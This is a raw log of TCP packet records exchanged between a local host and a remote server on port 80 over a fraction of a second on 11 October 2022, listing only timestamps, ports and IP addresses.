Oct 11, 2022 15:01:58.198637962 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.198651075 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.198657036 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.198695898 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.198749065 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.198754072 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.198767900 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.198797941 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.198817015 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.198817968 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.198833942 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.198860884 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.199057102 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.199090004 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.199116945 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.199132919 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.199145079 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.199146032 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.199171066 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.199415922 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.199467897 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.199489117 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.199512959 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.199532032 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.199573040 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.199574947 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.199892998 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.199911118 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.199964046 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.199985981 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.200017929 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.200032949 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.200063944 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.200135946 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.200189114 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.200195074 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.200279951 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.200304031 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.200320005 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.200349092 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.200576067 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.200634956 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.200651884 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.200654030 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.200668097 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.200678110 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.200699091 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.200848103 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.200890064 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.200901031 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.200930119 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.200954914 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.201001883 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.201023102 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.201035976 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.201064110 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.201137066 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.201154947 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.201172113 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.201186895 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.201209068 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.201231003 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.201245070 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.201272964 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.201710939 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.201730013 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.201770067 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.201782942 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.201790094 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.201807976 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.201819897 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.201833010 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.201848984 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.201896906 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.201934099 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.201936960 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.201972008 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.202064037 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.202081919 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.202095032 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.202107906 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.202126980 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.202413082 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.202433109 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.202482939 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.202497959 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.202524900 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.202560902 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.202574968 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.202588081 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.202620983 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.202634096 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.202651978 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.202675104 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.202687979 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.202692986 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.202732086 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.202739000 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.202771902 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.202776909 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.202785015 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.202811003 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.202819109 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.202860117 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.202882051 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.202900887 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.202918053 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.202920914 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.202936888 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.202943087 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.202951908 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.202963114 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.202986002 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.203166962 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.203186035 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.203212023 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.203236103 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.203264952 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.203299999 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.203311920 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.203337908 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.203340054 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.203352928 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.203377962 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.203576088 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.203610897 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.203620911 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.203629017 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.203648090 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.203649044 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.203672886 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.203687906 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.203699112 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.203712940 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.203739882 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.203895092 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.203938961 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.204008102 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.204026937 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.204051018 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.204051018 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.204071045 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.204090118 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.204130888 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.204144955 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.204169989 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.204298973 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.204335928 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.204358101 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.204375982 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.204397917 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.204410076 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.204423904 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.204444885 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.227384090 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.254146099 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.431793928 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.431868076 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.431910992 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.431943893 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.432051897 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.432128906 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.432548046 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.432596922 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.432637930 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.432657957 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.432674885 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.432714939 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.432715893 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.432754040 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.432756901 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.432782888 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.432801008 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.432821035 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.437321901 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.437352896 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.437376976 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.437402010 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.437426090 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.437450886 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.437450886 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.437469959 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.437525988 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.437525988 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.438081980 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.438111067 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.438137054 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.438163042 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.438172102 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.438191891 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.438218117 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.438222885 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.438245058 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.438263893 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.438266993 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.438287020 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.438334942 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.448931932 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.448981047 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.449014902 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.449048042 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.449080944 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.449079037 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.449079037 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.449114084 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.449141979 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.449146986 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.449146986 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.449166059 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.449176073 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.449208975 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.449218035 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.449244022 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.449250937 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.449278116 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.449286938 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.449311018 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.449321985 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.449345112 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.449357986 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.449369907 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.449388027 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.449419975 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.449431896 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.449453115 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.449467897 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.449485064 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.449486971 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.449503899 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.449512005 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.449537039 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.454008102 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.454063892 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.454097986 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.454122066 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.454196930 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.454196930 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.455231905 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.455281973 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.455353022 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.455353022 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.455394030 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.455395937 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.455410957 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.455456018 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.455462933 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.455506086 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.455521107 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.455562115 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.456099987 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.457098961 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.457145929 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.457190037 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.457248926 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.457376003 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.458774090 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.458854914 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.460777044 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.460836887 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.460879087 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.460891008 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.460891008 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.460941076 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.460949898 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.460994005 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.461007118 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.461052895 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.461064100 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.461100101 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.461127043 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.461142063 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.461194992 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.461211920 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.461257935 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.461267948 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.461301088 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.461323023 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.461350918 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.461373091 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.461416006 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.461426020 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.461447001 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.461472034 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.461513042 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.461555004 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.461566925 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.461596966 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.461608887 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.461652040 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.461653948 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.467122078 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.467175961 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.467211962 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.467246056 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.467279911 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.467287064 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.467314005 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.467343092 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.467343092 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.467349052 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.467365980 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.467376947 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.467402935 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.468548059 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.468591928 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.468626976 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.468657970 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.468661070 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.468679905 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.468694925 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.468696117 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.468708992 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.468729973 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.468744993 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.468755960 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.468808889 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.468823910 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.468892097 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.468894005 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.468926907 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.468957901 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.468990088 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.468996048 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.468996048 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.468996048 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.469022989 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.469027996 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.469054937 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.469072104 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.469086885 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.469098091 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.471028090 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.471065998 CEST	80	49700	194.76.225.60	192.168.2.4
